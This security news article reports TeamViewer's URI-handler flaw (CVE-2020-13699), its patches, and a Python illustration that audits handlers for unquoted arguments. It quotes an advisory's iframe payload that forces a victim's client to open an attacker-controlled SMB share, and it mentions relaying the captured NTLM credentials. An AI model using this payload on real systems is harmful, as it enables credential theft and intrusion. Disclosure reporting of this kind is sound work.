Popular remote-support software TeamViewer has patched a high-severity flaw in its desktop app for Windows. If exploited, the flaw could allow remote, unauthenticated attackers to execute code on users’ systems or crack their TeamViewer passwords.
TeamViewer is a proprietary software application used by businesses for remote-control functionalities, desktop sharing, online meetings, web conferencing and file transfer between computers. The recently discovered flaw stems from the Desktop for Windows app (CVE-2020-13699) not properly quoting its custom uniform resource identifier (URI) handlers.
An app registers the custom URI schemes it will handle, so that the operating system hands matching links to it. But because handler applications can receive data from untrusted sources, the URI values passed to the application may contain malicious data that attempts to exploit the app. In this specific case, the values are not “quoted” by the app when they are passed on the command line, meaning that TeamViewer will treat parts of them as command-line switches rather than as a single input value.
“An attacker could embed a malicious iframe in a website with a crafted URL (`<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'>`) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” according to an advisory by Jeffrey Hofmann, security engineer at Praetorian, who disclosed the flaw.
To initiate the attack, the attacker could simply persuade a victim with TeamViewer installed on their system to click on a crafted URL in a website, which gives attackers an opportunity to potentially launch watering-hole attacks.
The URI then tricks the app into opening a connection to an attacker-controlled remote Server Message Block (SMB) share. SMB is a network protocol used by Windows-based computers that allows systems within the same network to share files.
After a victim’s TeamViewer app initiates the remote SMB share, Windows will then make the connection using NT LAN Manager (NTLM). NTLM uses a challenge-response exchange to authenticate a user without transmitting the user’s password itself. NTLM credentials are based on data obtained during the interactive logon process and consist of a domain name, a user name, and a one-way hash of the user’s password.
In this attack scenario, the NTLM request can then be relayed by attackers using a tool like Responder, according to Hofmann. The Responder toolkit captures SMB authentication sessions on an internal network, and relays them to a target machine. This ultimately grants attackers access to the victim’s machine, automatically. It also allows them to capture password hashes, which they can then crack via brute-force.
Fortunately for users, while the potential impact of this vulnerability is high, “the practical impact is low,” Hofmann explained to Threatpost in an email. “Successfully performing the attack is difficult and requires user interaction. There are a lot of prerequisites to exploit the vulnerability successfully. Every modern browser except for Firefox URL encodes spaces when handing off to URI handlers which effectively prevents this attack.”
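To make the quoting defect (and Hofmann’s point about browsers URL-encoding spaces) concrete, here is an added Python illustration that is not code from TeamViewer, Praetorian or this article: it expands a handler command template the way Windows splits a command line (a simplified parser), and audits a constructed set of URI-handler registry entries for a bare `%1`. The executable path, the `safe-scheme` entry and the sample registry values are assumptions.

```python
import re

# Assumed command templates as they would appear under HKCR\<scheme>\shell\open\command.
# The first passes %1 bare (the defect); the second wraps it in quotes (the fix).
TEMPLATE_UNQUOTED = r'"C:\Program Files\TeamViewer\TeamViewer.exe" %1'
TEMPLATE_QUOTED = r'"C:\Program Files\TeamViewer\TeamViewer.exe" "%1"'

# Crafted URI as quoted from the advisory, and the form most browsers hand over
# (spaces percent-encoded), which is why they are not affected.
CRAFTED_URI = r'teamviewer10: --play \\attacker-IP\share\fake.tvs'
ENCODED_URI = CRAFTED_URI.replace(' ', '%20')


def windows_argv(cmdline: str) -> list:
    """Split a command line roughly as Windows does: whitespace separates
    arguments and double quotes group text. Backslash-quote escaping is
    omitted because none of the sample inputs need it."""
    args, cur, in_quote, have_token = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quote, have_token = not in_quote, True
        elif ch in ' \t' and not in_quote:
            if have_token:
                args.append(''.join(cur))
                cur, have_token = [], False
        else:
            cur.append(ch)
            have_token = True
    if have_token:
        args.append(''.join(cur))
    return args


def expand_handler(template: str, uri: str) -> list:
    """Substitute the URI into the handler template and show what argv the app sees."""
    return windows_argv(template.replace('%1', uri))


# Audit: a %1 that is not directly enclosed in double quotes lets a URI with spaces
# be split into extra arguments, which is the class of bug the advisory describes.
BARE_ARG = re.compile(r'(?<!")%1(?!")')

SAMPLE_HANDLERS = {  # constructed sample of registry values, not a real export
    'teamviewer10': TEMPLATE_UNQUOTED,
    'tvchat1': TEMPLATE_UNQUOTED,
    'safe-scheme': TEMPLATE_QUOTED,
}


def unquoted_handlers(handlers: dict) -> list:
    """Return the scheme names whose open command passes %1 without quotes."""
    return sorted(s for s, cmd in handlers.items() if BARE_ARG.search(cmd))
```

With the bare template the crafted URI becomes four arguments, so `--play` reaches the app as a switch; with the quoted template, or with the browser-encoded URI, it stays a single argument.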
The flaw ranks 8.8 out of 10.0 on the CVSS scale, making it high severity. TeamViewer versions prior to 15.8.3 are vulnerable, and the bug affects several of TeamViewer’s custom URI handlers, including: teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 and tvvpn1.
The issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3, said researchers.
Describing the patch, TeamViewer said in a statement sent to Threatpost: “We implemented some improvements in URI handling relating to CVE 2020-13699. Thank you, Jeffrey Hofmann with Praetorian, for your professionalism and following a responsible disclosure model. We are grateful that you reached out to us and that you could confirm the fix of your findings in the latest release.”
In a security advisory regarding the flaw, the Center for Internet Security (CIS) recommended that TeamViewer users apply the appropriate patches. They also recommended that users avoid untrusted websites or links provided by unknown sources, and “educate users regarding threats posed by hypertext links contained in emails or attachments, especially from untrusted sources.”
TeamViewer’s remote-control functionality makes it a lucrative target for bad actors, especially with more enterprises turning to collaboration apps like TeamViewer during the pandemic. In 2019, a targeted, email-borne attack against embassy officials and government finance authorities globally weaponized TeamViewer to gain full control of the infected computer. And earlier in 2020, a newly discovered variant of the Cerberus Android trojan was found with vastly expanded and more sophisticated info-harvesting capabilities, including the ability to run TeamViewer.